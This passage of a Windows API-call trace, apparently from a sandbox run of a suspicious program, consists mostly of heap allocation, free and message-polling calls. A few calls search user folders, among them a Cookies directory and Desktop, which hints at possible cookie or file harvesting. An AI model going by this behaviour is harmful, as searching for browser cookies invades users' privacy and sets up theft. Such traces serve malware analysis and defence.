wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0072.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b70 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b70 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b738 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690af0 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa60 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dce8 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8e0 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9a0 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddb0 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9b8 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690aa0 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a90 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9d0 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9e8 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0073.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a80 | out: hHeap=0x650000) returned 1 [0073.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a70 | out: hHeap=0x650000) returned 1 [0073.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0073.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a30 | out: hHeap=0x650000) returned 1 [0073.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0073.000] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0073.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b20 [0073.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.000] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0073.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0073.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0073.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0073.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690b20 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9e8 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690a30 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9d0 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a70 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9b8 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a80 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9a0 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690a90 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3480 [0073.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9a0 | out: hHeap=0x650000) returned 1 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9a0 [0073.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9a0 | out: hHeap=0x650000) returned 1 [0073.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a80 | out: hHeap=0x650000) returned 1 [0073.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a70 | out: hHeap=0x650000) returned 1 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690a70 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9a0 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690a80 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8e0 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690aa0 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa60 [0073.001] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690b10 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa00 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690af0 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690af0 | out: hHeap=0x650000) returned 1 [0073.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76a7c0 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1f8 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ac0 [0073.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1f8 | out: hHeap=0x650000) returned 1 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dce8 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1f8 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690af0 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a988 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b210 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a868 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b70 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6d0 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690a50 [0073.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6d0 | out: hHeap=0x650000) returned 1 [0073.002] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc48 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6d0 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b30 [0073.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6d0 | out: hHeap=0x650000) returned 1 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc20 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd60 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6d0 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b00 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a958 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b738 [0073.003] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2a0 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ab0 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a778 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8f8 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ae0 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b288 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ad0 [0073.003] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.003] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.004] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.004] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0073.004] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.004] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b80 [0073.004] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.004] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.004] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b90 [0073.004] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d34d8 [0073.004] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.004] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.004] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b80 | out: hHeap=0x650000) returned 1 [0073.004] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.004] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x77c6e0d2, ftCreationTime.dwLowDateTime=0x76b2e8, ftCreationTime.dwHighDateTime=0x50, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x76ac06, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x85a028b, nFileSizeHigh=0xb806a, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="", cAlternateFileName="?haဓ\x03\x10")) returned 0xffffffff [0073.004] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0073.004] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b90 | out: hHeap=0x650000) returned 1 [0073.004] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2e8 | out: hHeap=0x650000) returned 1 [0073.004] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.004] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ad0 | out: hHeap=0x650000) returned 1 [0073.005] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.005] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ad0 [0073.005] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b90 [0073.005] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0073.005] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b90 | out: hHeap=0x650000) returned 1 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ad0 | out: hHeap=0x650000) returned 1 [0073.005] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.005] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b300 [0073.005] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b2e8 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2e8 | out: hHeap=0x650000) returned 1 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b738 | out: hHeap=0x650000) returned 1 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a50 | out: hHeap=0x650000) returned 1 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a958 | out: hHeap=0x650000) returned 1 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6d0 | out: hHeap=0x650000) returned 1 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b00 | out: hHeap=0x650000) returned 1 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd60 | out: hHeap=0x650000) returned 1 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a868 | out: hHeap=0x650000) returned 1 [0073.005] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b70 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b30 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dce8 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddb0 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b210 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1f8 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690af0 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a778 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2a0 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ab0 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b288 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8f8 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ae0 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7c0 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a30 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a70 | out: hHeap=0x650000) returned 1 [0073.006] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a80 | out: hHeap=0x650000) returned 1 [0073.007] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690aa0 | out: hHeap=0x650000) returned 1 [0073.007] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0073.007] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0073.007] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9e8 | out: hHeap=0x650000) returned 1 [0073.007] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3480 | out: hHeap=0x650000) returned 1 [0073.007] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a90 | out: hHeap=0x650000) returned 1 [0073.007] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9b8 | out: hHeap=0x650000) returned 1 [0073.007] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9d0 | out: hHeap=0x650000) returned 1 [0073.007] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9a0 | out: hHeap=0x650000) returned 1 [0073.007] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8e0 | out: hHeap=0x650000) returned 1 [0073.007] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa60 | out: hHeap=0x650000) returned 1 [0073.007] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa00 | out: hHeap=0x650000) returned 1 [0073.007] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0073.007] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0073.007] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0073.007] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0073.007] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a90 [0073.007] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a90 | out: hHeap=0x650000) returned 1 [0073.007] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0073.007] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a90 [0073.007] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0073.007] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa00 [0073.007] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b10 [0073.007] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0073.007] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc1a62260, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc1a62260, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x61e84c, dwReserved1=0x657690, cFileName="Desktop", cAlternateFileName="")) returned 1 [0073.007] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa60 [0073.008] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8e0 [0073.008] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b10 [0073.008] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa00 | out: hHeap=0x650000) returned 1 [0073.008] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0073.008] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a90 | out: hHeap=0x650000) returned 1 [0073.008] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8e0 | out: hHeap=0x650000) returned 1 [0073.008] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0073.008] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa60 | out: hHeap=0x650000) returned 1 [0073.008] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0073.008] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b10 [0073.008] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb790 [0073.008] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690a90 [0073.008] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb790 | out: hHeap=0x650000) returned 1 [0073.008] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a90 | out: hHeap=0x650000) returned 1 [0073.008] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0073.008] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0073.008] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b10 [0073.008] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb790 [0073.008] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690a90 [0073.008] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb790 | out: hHeap=0x650000) returned 1 [0073.008] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a90 | out: hHeap=0x650000) returned 1 [0073.008] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0073.008] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89f8 [0073.008] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0073.008] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b10 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a90 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690aa0 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a80 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690a70 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.009] CharUpperBuffW (in: 